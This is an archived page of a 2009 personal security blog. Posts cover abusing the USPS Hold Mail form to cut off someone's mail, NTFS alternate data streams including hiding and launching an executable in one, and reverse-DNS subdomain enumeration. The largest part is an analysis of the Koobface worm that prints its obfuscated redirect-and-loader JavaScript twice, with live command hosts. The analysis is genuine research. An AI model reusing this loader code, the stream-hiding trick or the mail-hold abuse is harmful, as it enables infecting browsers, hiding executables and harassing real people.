Friday, December 18, 2009

Free DOS Mail Attack

UPDATE: Well, I searched around to try and find other articles about this, and I came up with a bunch of them. Two of them can be found here: http://msmvps.com/blogs/alunj/archive/2007/06/09/can-t-i-trust-the-postal-service-part-3-the-service.aspx and at Bruce Schneier's blog here http://www.schneier.com/blog/archives/2006/04/man_diverts_mai.html

The online change of address service is a little better. It charges $1 to a credit card. It says it checks your identity using your payment info, but I'm sure you could get around that with a little social engineering. That idea is even scarier than the one I've written about in this post...

If my wife and I are going to be out of town for any extended period of time, we usually put our mail on hold so it won't be sitting there in our mailbox. We usually do this online at the USPS website. It had been quite a while since I had done this, and it occurred to me just how vulnerable this is to "attack". All the page requires is your name and address. No verification is required to make sure that the person placing the hold request is actually authorized to do so.

Talk about a DOS attack! All you need to know is someone's address and name and the dates you don't want them to receive any mail, and BOOM! you've denied that person of any mail. They can pick it up later though once they figure it out.

I looked more into this to see if there were any other catches that makes it at least a little more secure than I initially thought, but it turns out it's actually worse! This is what the FAQ on Hold Mail says:
  • Do I need to submit multiple Hold Mail requests if there is more than one person at the same address?

    All mail regardless of name will be held for the address entered. Submitting a Hold Mail request once is all that is required to holdmail delivery for everyone at the address.
So, not only do you hold all mail for that one person, you hold all mail for that entire address! It gets better! (also from the same FAQ page):
  • How do I make changes to a previously submitted Hold Mail request?

    To make changes to your original online or telephone Hold Mail request (dates, options, etc.), you will need your confirmation number. If making the change online:
    1. Go to Hold Mail Service and select "Edit or Cancel your HoldMail Request." The system will proceed to the "Customer Information" page.
    2. Select the "Edit your request" radio button and enter your confirmation number, street name/number, city, state, and 5-digit ZIP Code. The confirmation number is not case sensitive.
    3. After you enter the requested information, press the "Continue" button. The system will proceed to the "Edit a Request" page and display your HoldMail Request.
    4. Modify the beginning date, ending date or both to fit your current plans. If your Hold Mail request has started, you can only modify the ending date.
    5. After making updates, scroll to the bottom of the page and press the "Continue" button. Then press "Yes" to verify.
    6. A confirmation page will be displayed to indicate your request has been updated.
    To change an online or telephone Hold Mail request, you may also call us toll free at 1-800-ASK-USPS (1-800-275-8777) to cancel your request. You will need your confirmation number to alter your request by phone.

    If you made your Hold Mail request in person at your local Post Office or you do not have your confirmation number, you will need to go to your local Post Office to make changes to your Hold Mail request.
Wow, what a pain! If you do this, you will essentially be forcing them to go into the local Post Office in order to make any changes, since they need a confirmation code to change it online or over the phone.

Crazy stuff! There is also a text box for additional instructions. This is where things could really start to get interesting. You could try and switch people's mail by adding additional instructions to deliver all mail while "we" are gone to "my friend's" address (their neighbors) and then deliver all mail from the neighbor to "his friend's address" (the original target). This would probably confuse the heck out of any mail man (or is mail-worker more correct? Briefträger?), as well as both neighbors.

There are more nefarious deeds that come to mind about this, but I'll leave that up to you to have fun imagining things.

Wednesday, December 16, 2009

To Infinity, and Beyond!

Finally! I've got one more project to finish for my graphics class and then I'll be officially done as an undergraduate at BYU! Now I should have a lot more time to finish writing up all of those blogposts that I stubbed out and never finished (really, there are quite a lot of them). You can expect this blog to be a lot more active now.

I've also been applying around for security-related jobs in fields such as web-application security, network security, malware analysis, CNA/CNE (computer network attack, computer network exploitation), penetration testing, security research, etc. If you happen to know of an opening somewhere, or know of someone else who might know, shoot me an email.

Thursday, October 15, 2009

Feeds I Monitor

Sometimes I want to share the security feeds/blogs I monitor with others, so I usually just give out this link http://www.bloglines.com/public/nephi-johnson. BUT, Bloglines is really really slow opening some of the feeds from that link. So, I've decided to just post all of the feeds and blogs I monitor here:

-atlas wandering-
.:Computer Defense:.
360 Security
ADD / XOR / ROL
Alex's Corner
Amrit Williams Blog
An IT Professional’s Blog
Anachronic
Andrew Martin
Anurag Agarwal - Application Security Evangelist
AppSec Street Fighter - SANS Institute
Billy (BK) Rios
Blog | Security Whole
Boaz Gelbord
Bugtraq
CGISecurity - Website and Application Security News
cktricky and Web Application Security
Command Line Kung Fu
Confessions of a Penetration Tester
Daily Dave
Dancho Danchev's Blog - Mind Streams of Information Security Kno
DarkReading - All Stories
deep inside | security & tools
Denim Group, Ltd.
Digital Soapbox - Preaching Security to the Digital Masses
Disenchant's Blog
Eric's Musings on the Security World
EvilFingers
F-Secure Antivirus Research Weblog
F-Secure Latest 10 Corporate News Rss Feed
FireEye Malware Intelligence Lab
Firewall Wizards
Forage Security
Full Disclosure
gnarlysec
GNUCITIZEN
ha.ckers.org web application security lab
hackademix.net
Hex blog
Honeypots
IDS Focus
In.Security Home
Incidents
Indistinguishable from Jesse
Info Security News
It's a shampoo world anyway
Jack Mannino
Jeremiah Grossman
k3r0s1n3
Laramies Corner
Matasano Chargen
Matt Blaze's Exhaustive Search
McAfee Avert Labs
Michael Howard's Web Log
Minded Security Blog
MS Sec Notification
Network Security Blog
Nibble Security
Nitesh Dhanjani
omg.wtf.bbq.
p42 labs
PaulDotCom
Penetration Testing
PortSwigger.net - web application security
random dross
The RISKS Forum
SANS Internet Storm Center, InfoCON: green
SANS ISC SecNewsFeed
Schneier on Security
SecureWorks Research Blog
Security Bytes
The Security Catalyst
Security Fix
Security Incite Rants
The Security Shoggoth
Security Thoughts
Security to the Core | Arbor Networks Security » 2009
SecurityRecruiter.com's Security Recruiter Blog
Shadowserver Foundation | Information / Whitepapers
Shadowserver Foundation | Main / HomePage
Silver Tail Blog
sirdarckcat
Skeptikal.org
Slashdot
The Spanner
Sunbelt Blog
Suspekt...
Sylvan von Stuppe
Tactical Web Application Security
TaoSecurity
Technicalinfo.net Security
Threat Level
ThreatExpert Blog
ThreatFire Research Blog
TrendLabs | Malware Blog - by Trend Micro
TwitPwn
Vulnerability Development (vuln-dev) Mailing List
Web App Security
Webmonkey
Wired Top Stories
XSSed syndication
Zero Day
Zscaler Research

Enjoy! I'll be keeping this updated as well.

Monday, October 5, 2009

CERT Secure Coding Site Down

(10/5/2009 8:54 AM) EDIT:The site is now up and running

Well, this would be at least a little embarassing:


At the time of this posting, the entire securecoding.cert.org site seems to be down. Isn't information disclosure part of secure coding? The error message probably isn't a big deal, but still...

This is what cert.org says about information disclosure on their site: actual link, google's cache. A better link: Top 25 Programming Errors (see CWE-209).

Sunday, September 27, 2009

Koobface Javascript Explained

In this post, I'll be going through the javascript files that I've found through links that have been posted on facebook. An example of the original file is shown below:
Javascript
// KROTEG
var pwdfqiyjsclgezbrt9 = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var fomqnzlcd1 = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var sxhidbqvre1 = '', xbujdriqngovtsz3 = '', psgyket3 = '', svzlnruwojfhi7 = '';
var zkglq4 = '' + eval('doc'+sxhidbqvre1+'ume'+xbujdriqngovtsz3+'nt.r'+psgyket3+'efer'+svzlnruwojfhi7+'rer'), ygepvbrakftloqmhwc6 = '';
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < pwdfqiyjsclgezbrt9.length; nilhfdopsrx7 ++) {
    if ((zkglq4.indexOf(pwdfqiyjsclgezbrt9[nilhfdopsrx7][0]) != -1)) {
  ygepvbrakftloqmhwc6 = '/f=' + pwdfqiyjsclgezbrt9[nilhfdopsrx7][1];
  break;
    }
}
window.redirect = '';
function urocwfkgdsjq6() {
 var higeruoxzcnqsbad9 = '' + window.redirect;
 if (higeruoxzcnqsbad9.length > 0) window.location.href = higeruoxzcnqsbad9;
 else setTimeout('urocwfkgdsjq6()', 50);
}
urocwfkgdsjq6();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < fomqnzlcd1.length; nilhfdopsrx7 ++) {
 var onjrmgcaifxsqtzb9 = document.createElement('script');
 onjrmgcaifxsqtzb9.type = 'text/javascript';
 onjrmgcaifxsqtzb9.src = 'http://' + fomqnzlcd1[nilhfdopsrx7] + '/go' + '.js' + '?0x3' + 'E8' + ygepvbrakftloqmhwc6 + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(onjrmgcaifxsqtzb9);
}
And here is my version of it (I de-obfuscated most of it):
De-Obfuscated Javascript
// KROTEG
var referrers = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var ipAddresses = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var docReferrer = '' + eval('document.referrer'), newPath = '';
for (var i = 0; i < referrers.length; i ++) {
    if ((docReferrer.indexOf(referrers[i][0]) != -1)) {
  newPath = '/f=' + referrers[i][1];
  break;
    }
}
window.redirect = '';
function WaitForRedirect() {
 var currRedirect = '' + window.redirect;
 if (currRedirect.length > 0) window.location.href = currRedirect;
 else setTimeout('WaitForRedirect()', 50);
}
WaitForRedirect();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var i = 0; i < ipAddresses.length; i ++) {
 var scriptTag = document.createElement('script');
 scriptTag.type = 'text/javascript';
 scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(scriptTag);
}
Ok, now to go through it step by step (I am going to assume you have some experience with javascript).

The first thing this script does is get the referrer here:
Referrer
var docReferrer = '' + eval('document.referrer'), newPath = '';
Then the script tries to find a domain in its referrers array that is found in the docReferrer variable. If it finds one that matches, it sets the newPath variable to /f=<referrer abbreviation>
Matching the referrrer
for (var i = 0; i < referrers.length; i ++) {
    if ((docReferrer.indexOf(referrers[i][0]) != -1)) {
       newPath = '/f=' + referrers[i][1];
       break;
    }
}
The next thing the script does is set window.redirect to "" (window.redirect = '';). Then it defines a function that uses setTimeout() to periodically (and semi-asynchronously) check window.redirect to see if there is any data stored there. If there is, the window.location.href is set to the window.redirect variable, redirecting the browser to the new location. This is shown below:
WaitForRedirect() function
window.redirect = '';
function WaitForRedirect() {
 var currRedirect = '' + window.redirect;
 if (currRedirect.length > 0) window.location.href = currRedirect;
 else setTimeout('WaitForRedirect()', 50);
}
WaitForRedirect();
After making the initial call to the WaitForRedirect() function, the script sets the variable js to one of /view, /cnet, /warn, /scan or blank (''), based on the id number of your account on any one of the social networking sites koobface targets. The way it does this isn't very straightforward. First, it looks for the "?id=" substring in the href:
var n = location.href.indexOf('?id=');
Then, if the current href contains the "?id=" substring, then it tries to parse the id of your account by parsing anything that comes after "?id=":
if (n != -1) { n = parseInt(location.href.substr(n + 4)); ... }
Then the script assigns the js variable to a new value, depending on the magnitude of your id. If your id is greater than or equal to 401, js will always be "/view". This would be the case for all (I think) facebook accounts, as well as any other account on a site, unless you were one of the first 400 people to sign up and the site uses sequential ids. I'm not quite sure why the script would want to specifically check for this, unless it's b/c the main site they are targeting uses pages that serve the correct content based on the id url param (hence the ?id=). Still have to figure out more on this one.

The last thing the script does is append a new script tag to the DOM head for each ip in its ipAddresses array:
New javascript for each ip
for (var i = 0; i < ipAddresses.length; i ++) {
 var scriptTag = document.createElement('script');
 scriptTag.type = 'text/javascript';
 scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(scriptTag);
}
This is done in case one of the ips is taken out or stops working. The first script to get loaded assigns the window.redirect variable to a new value. This can be seen in the source of one of the scripts: (At the time of this writing, the ip 113.254.53.10 was up and working)
Second script content
window.redirect='h t t p://113.254.53.10/d='+location.hostname+'/0x3E8/f=fb2/cnet/';
Note that the /f=fb2/cnet/ part of the the string being assigned to window.redirect will change based on what site you were on when you clicked the link, as well as what the id= url-param was.

Remember that WaitForRedirect() function we explained earlier and how it periodically checks for a non-blank string in the window.redirect variable? Once the second script assigns a non-blank string to that variable, the WaitForRedirect() function will redirect the browser to the new url. From there, many different things may happen, but it looks like most of them are social networking site look-alikes that try and get you to run an executable that automatically starts downloading.

Well, that's about it for tonight :)

Koobface on my Facebook II

Well, while I was starting to write up a post describing what the javascript file does, I found another link for koobface on my facebook! This time from a different domain: h t t p ://www.blackjackorchestra.eu/privaledwd/. This link does the exact same thing as the one in the previous post, except for a few differences in their php script quality :), as well as a few other minor changes. In my previous post, I described how the server-side script checked to see if you gave it a valid User-Agent before sending you the javascript in the content. This site does the same thing, but I guess some debug info was left in it! Here's the content that's sent back if you send it a request that does not contain a User-Agent header:
Request & Response (using netcat):
C:\>nc www.blackjackorchestra.eu 80
GET /privaledwd/ HTTP/1.1
HOST: www.blackjackorchestra.eu

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.1.1
X-Powered-By: ASP.NET
Date: Sun, 27 Sep 2009 15:32:28 GMT
Connection: close

<br />
<b>Notice</b>:  Undefined index:  HTTP_USER_AGENT in <b>d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php</b> on line <b>30</b><br />
<br />
<b>Notice</b>:  Undefined index:  HTTP_USER_AGENT in <b>d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php</b> on line <b>37</b><br />
<br />
<b>Notice</b>:  Undefined variable: rscript in <b>d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php</b> on line <b>42</b><br />
<title>Amazing Video</title>
ocwdtreifoyocrb egzcqgtcfx
<img src=afjo4blr.jpg>
ocecaahcqgeuzk qduzqsc
PHP Notice:  Undefined index:  HTTP_USER_AGENT in d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php on line 30
PHP Notice:  Undefined index:  HTTP_USER_AGENT in d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php on line 37
PHP Notice:  Undefined variable: rscript in d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php on line 42
Someone forgot to take out their debug info! Hahaha :) Well, if you do send a valid User-Agent, this is the content that gets sent back:
zzmjqoqvri byiktuysec
<script src="9r.js"></script> 
yadoemvy ilxnsxiilmsnqbb
Also, the javascript file is exactly the same, except for different random names for the variables, and two different ip addresses. The script in the last post had these two addresses: 59.93.80.251, 79.182.37.95. The script in this post doesn't have those two addresses, but has these two instead: 217.132.126.129, 90.17.65.193. Well, I think that covers it for this new koobface url. Now onto writing about that javascript...

Thursday, September 24, 2009

Koobface on my Facebook!

I was checking my facebook earlier today (something I almost never do), and noticed that someone had left a weird link on my wall: h t t p ://s217307881.mialojamiento.es/y0urc1ip/ I first visited the page in Firefox with javascript and such turned off. This is the source of the page as seen from firefox:
pcnxnkcaiztp cvnxmxxrgscdvkr
<script src="9j72fkj-de1w.js"></script>
qgdtubgfdho adbdzoam
I then decided to visit the page from the command line using netcat:
C:\>nc s217307881.mialojamiento.es 80
GET /y0urc1ip/ HTTP/1.1
Host: s217307881.mialojamiento.es

HTTP/1.1 200 OK
Date: Thu, 24 Sep 2009 18:40:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Transfer-Encoding: chunked
Content-Type: text/html

6e
<title>Amazing Video</title>
ucctsfnqmvyh ldaumylhrlljfb
<img src=j18sda5ncm8.jpg>
exlyansstgifbh wsrwmduxllj

0
Notice the difference? No javascript tag is found in the source. I did a little experimenting with the server and found that only requests that contain valid User-Agent headers will get the script tag:
C:\>nc s217307881.mialojamiento.es 80
GET /y0urc1ip/ HTTP/1.1
Host: s217307881.mialojamiento.es
User-Agent: The Old Laundry Basket

HTTP/1.1 200 OK
Date: Thu, 24 Sep 2009 18:49:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Transfer-Encoding: chunked
Content-Type: text/html

6a
<title>Amazing Video</title>
ozgauyjgghjy aabkqxigumthaux
<img src=j18sda5ncm8.jpg>
jorivrc bjajszitzkdqh

0
This one is sending a User-Agent string that IE8 uses:
C:\Documents and Settings\Student>nc s217307881.mialojamiento.es 80
GET /y0urc1ip/ HTTP/1.1
Host: s217307881.mialojamiento.es
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 3.0.30729; InfoPath.3; .NET CLR 4.0.20506)

HTTP/1.1 200 OK
Date: Thu, 24 Sep 2009 18:58:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Transfer-Encoding: chunked
Content-Type: text/html

5c
upthmidfi ajglroelpsymijw
<script src="9j72fkj-de1w.js"></script>
ailsoghinur aaqajwmblrnbj

0
Now, onto the Javascript file: 9j72fkj-de1w.js. Below is the original contents of the file:
// KROTEG
var pwdfqiyjsclgezbrt9 = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var fomqnzlcd1 = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var sxhidbqvre1 = '', xbujdriqngovtsz3 = '', psgyket3 = '', svzlnruwojfhi7 = '';
var zkglq4 = '' + eval('doc'+sxhidbqvre1+'ume'+xbujdriqngovtsz3+'nt.r'+psgyket3+'efer'+svzlnruwojfhi7+'rer'), ygepvbrakftloqmhwc6 = '';
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < pwdfqiyjsclgezbrt9.length; nilhfdopsrx7 ++) {
    if ((zkglq4.indexOf(pwdfqiyjsclgezbrt9[nilhfdopsrx7][0]) != -1)) {
  ygepvbrakftloqmhwc6 = '/f=' + pwdfqiyjsclgezbrt9[nilhfdopsrx7][1];
  break;
    }
}
window.redirect = '';
function urocwfkgdsjq6() {
 var higeruoxzcnqsbad9 = '' + window.redirect;
 if (higeruoxzcnqsbad9.length > 0) window.location.href = higeruoxzcnqsbad9;
 else setTimeout('urocwfkgdsjq6()', 50);
}
urocwfkgdsjq6();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < fomqnzlcd1.length; nilhfdopsrx7 ++) {
 var onjrmgcaifxsqtzb9 = document.createElement('script');
 onjrmgcaifxsqtzb9.type = 'text/javascript';
 onjrmgcaifxsqtzb9.src = 'http://' + fomqnzlcd1[nilhfdopsrx7] + '/go' + '.js' + '?0x3' + 'E8' + ygepvbrakftloqmhwc6 + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(onjrmgcaifxsqtzb9);
}
And here is my version of it:
// KROTEG
var referrers = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var ipAddresses = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var docReferrer = '' + eval('document.referrer'), newPath = '';
for (var i = 0; i < referrers.length; i ++) {
    if ((docReferrer.indexOf(referrers[i][0]) != -1)) {
  newPath = '/f=' + referrers[i][1];
  break;
    }
}
window.redirect = '';
function WaitForRedirect() {
 var currRedirect = '' + window.redirect;
 if (currRedirect.length > 0) window.location.href = currRedirect;
 else setTimeout('WaitForRedirect()', 50);
}
WaitForRedirect();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var i = 0; i < ipAddresses.length; i ++) {
 var scriptTag = document.createElement('script');
 scriptTag.type = 'text/javascript';
 scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(scriptTag);
}
I did some searching around for the word "KROTEG" and found this link: http://r3v3rs3e.wordpress.com/tag/kroteg/. What was on my wall was just another variant of the koobface worm.

I must say though, I found the javascript obfuscation to be quite simple to undo, which I did not expect coming from something that receives so much press.

I don't have time now to explain what the js file does, but will go through that in another post.

Sunday, September 20, 2009

W3 Simple Proxy/Anonymizer with Custom User-Agent

A while ago I decided to hit the XHTML Validate link to see what the W3 XHTML Validator said was wrong with a web page. Of course, there were tons of things wrong (I don't know why people ever put the link on their page because they are never compliant with the w3 standards). Anyways, I noticed that it gives you the option to view the source code of the page it's supposed to be validating and thought you could use this as a proxy to view html web pages. Also, the w3 validator gives you the option of specifying the user-agent header that will be sent to the server, which could come in handy. They also seem to have a mechanism in place to keep you from inserting additional headers into the HTTP Request sent to the server, although the mechanisms for the uri param and the user-agent param are different.

Here's a sample url http://translate.google.com/translate?hl=en&sl=es&tl=en&u=http://validator.w3.org/check%3Furi%3Dhttp://gnarlysec.blogspot.com%26charset%3D(detect%2Bautomatically)%26doctype%3DInline%26ss%3D1%26group%3D0%26user-agent%3DW3C_Validator/1.654. The source at the bottom of the page would still need to be parsed out, but that's the basic idea. Also note the url param "user-agent".

Monday, August 17, 2009

Local Proxies with IE and Chrome

As I do web development, I often find it easier to setup a local proxy using Paros or Burp to more easily manipulate values being sent to the server. I usually use Firefox as my main web browser, and consequently almost exclusively setup Firefox to listen to the local proxy. The other day, I didn't feel like using Firefox, so I used IE instead and told it to use the local proxy I had setup using Burp. At the time, I also had Google Chrome running.

Everything went well for requests I had made using IE. Burp captured all requests and responses that were sent. Then I noticed another request/response that I didn't trigger through IE:
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: www.download.windowsupdate.com
Proxy-Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache



HTTP/1.1 200 OK
Content-Length: 18
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "0e4bf26aecac91:803b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 9261
Date: Mon, 17 Aug 2009 13:00:35 GMT
Last-Modified: Fri, 01 May 2009 22:42:48 GMT
Connection: keep-alive

1401C9CAAE2685483A
I'm not sure yet if it's IE sending this request, or some other program/service that is looking for windows updates.

I did notice, however, that all requests/responses sent through Google Chrome also get captured by the local proxy I had setup for IE with Burp. Not only do all Chrome requests get captured, but so do all http requests sent by all Visual Studio Express products (probably Visual Studio as well). I'm sure there are tons of other requests as well that would be captured by doing this.

Saturday, August 15, 2009

Alternate Data Streams

In my recent Operating Systems class, I was supposed to give a 15 minute presentation about the windows file system. Instead of talking only about that, I got permission to talk about alternate data streams. This is my presentation (yes, somewhat short and brief, but I think it still gives a good description of why/how alternate data streams work).

A good part of my presentation was doing live demonstrations of how alternate data streams can be used from the command line. Here are some examples:
C:\ads>echo >stream.txt default unnamed data stream

C:\ads>dir
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\ads

08/15/2009  07:37 AM    <DIR>          .
08/15/2009  07:37 AM    <DIR>          ..
08/15/2009  07:37 AM                30 stream.txt
               1 File(s)             30 bytes
               2 Dir(s)  17,025,347,584 bytes free

C:\ads>more < stream.txt
 default unnamed data stream

C:\ads>echo >stream.txt:ads alternate (named) data stream

C:\ads>dir
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\ads

08/15/2009  07:37 AM    <DIR>          .
08/15/2009  07:37 AM    <DIR>          ..
08/15/2009  07:38 AM                30 stream.txt
               1 File(s)             30 bytes
               2 Dir(s)  17,025,347,584 bytes free

C:\ads>more < stream.txt:ads
 alternate (named) data stream

C:\ads>type C:\WINDOWS\notepad.exe > stream.txt:other_notepad.exe

C:\ads>start C:\ads\stream.txt:other_notepad.exe

C:\ads>cd ..

C:\>echo >ads:folder_data_stream folders can have named data streams as well

C:\>more <ads:folder_data_stream
 folders can have named data streams as well

C:\>dir ads
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\ads

08/15/2009  07:39 AM    <DIR>          .
08/15/2009  07:39 AM    <DIR>          ..
08/15/2009  07:38 AM                30 stream.txt
               1 File(s)             30 bytes
               2 Dir(s)  17,024,843,776 bytes free

C:\>dir /a:d ad?
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\

08/15/2009  07:39 AM    <DIR>          ads
               0 File(s)              0 bytes
               1 Dir(s)  17,024,843,776 bytes free

C:\>

Reverse DNS Lookups from the Command Line

Last week, I was received an email "from a friend" that invited me to create an account on some site in order to view "some pictures" he had sent me. The last step in the sign-up process included giving the site my gmail login information, which I was not about to do. At that point, I wondered if my friend was aware that I had been sent a message "from him". It turned out that he was not aware that the site had sent out an email to me. He did say, however, that he had gone through the signup process and had given the site his gmail login information. Following that, the site had sent emails to everyone it could find in his gmail account, telling them all that he had pictures he wanted to show them.

Needless to say, I found this rather disconcerting and wanted to find more information about the site. One of the things I did was to figure out what other subdomains the site has on its server.

It's easy enough to figure out the main ip address of a website. From there, finding many subdomains isn't hard. Most web hosting companies give out ip addresses in a somewhat sequential manner. Most companies sign up for their main servers all at the same time. This should mean that their servers' ip addresses are clustered around each other, which makes it easy to enumerate all of them and see if the resolved domain names for the ip addresses belong to the site. This is how I did this from the command line:
@del ips.txt 2>nul &cmd /c "for /l %i in (0, 1, 255) do @echo 216.157.72.%i >> ips.txt & @echo 216.157.73.%i >> ips.txt" & nslookup 2>nul < ips.txt > results.txt & type results.txt | find /i "wegame"
Yeah, I know it's a bit much all at once. This is how it looks made a bit more readable
@del ips.txt 2>nul &
cmd /c 
    "for /l %i in (0, 1, 255) do
        @echo 216.157.72.%i >> ips.txt &
        @echo 216.157.73.%i >> ips.txt" &
nslookup 2>nul < ips.txt > results.txt &
type results.txt | find /i "wegame"
So, I start out deleting any old ips.txt laying around, sending any error output to nul ( @del ips.txt 2>nul ). Then I run a for loop that generates ips in a separate cmd (hence the cmd /c). The for loop loops from 0 to 255 ( for /l %i in (0, 1, 255) ) and appends each loop value (%i) to the two ip addresses (216.157.72. and 216.157.73.). I chose to generate ips in this range because the main server's ip address is 216.157.72.224, almost in the middle of both ranges. After generating the ip addresses, I send the resulting file (ips.txt) to nslookup ( < ips.txt ), send any error output to nul ( 2>nul ), and output the results to a text file ( > results.txt ). I then type the contents of results.txt, piping the output to a find command that searches for the name "wegame" ( type results.txt | find /I "wegame" ). The output looks like this:
Name:    test3.wegame.com
Name:    test3.wegame.com
Name:    medproc3.wegame.com
Name:    medproc3.wegame.com
Name:    db2.wegame
Name:    db2.wegame
Name:    vip1.wegame.com
Name:    fw.wegame
Name:    medproc1.wegame
Name:    medproc1.wegame
Name:    medproc2.wegame
Name:    medproc2.wegame
Name:    test2.wegame
Name:    test2.wegame
Name:    test1.wegame
Name:    test1.wegame
You could also make it more verbose about what it is doing by changing it to look like this:
@echo . & @echo ------------------------------ & @echo . NSLOOKUP SCRIPT & @echo ------------------------------ & @echo . & @echo . Generating ips into ips.txt & @del ips.txt 2>nul & cmd /c "for /l %i in (0, 1, 255) do @echo 216.157.72.%i >> ips.txt & @echo 216.157.73.%i >> ips.txt" & @echo . Running nslookup on generated ips & @echo . (results outputted to results.txt) & nslookup 2>nul < ips.txt > results.txt & @echo . Searching results for [wegame] & type results.txt | find /i "wegame" & @echo . DONE!
The new output will look like this:
.
------------------------------
.      NSLOOKUP SCRIPT
------------------------------
.
.     Generating ips into ips.txt
.     Running nslookup on generated ips
.           (results outputted to results.txt)
.     Searching results for [wegame]
Name:    test3.wegame.com
Name:    test3.wegame.com
Name:    medproc3.wegame.com
Name:    medproc3.wegame.com
Name:    db2.wegame
Name:    db2.wegame
Name:    vip1.wegame.com
Name:    fw.wegame
Name:    medproc1.wegame
Name:    medproc1.wegame
Name:    medproc2.wegame
Name:    medproc2.wegame
Name:    test2.wegame
Name:    test2.wegame
Name:    test1.wegame
Name:    test1.wegame
.  DONE!

Friday, August 14, 2009

Clipboard Attacks

